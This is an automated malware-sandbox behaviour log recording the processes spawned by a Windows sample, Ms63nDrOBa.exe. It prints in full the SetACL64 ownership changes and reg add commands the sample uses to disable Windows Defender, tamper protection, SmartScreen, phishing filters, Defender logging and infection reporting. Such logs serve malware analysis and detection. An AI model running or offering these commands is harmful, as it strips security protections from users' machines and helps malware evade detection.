Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |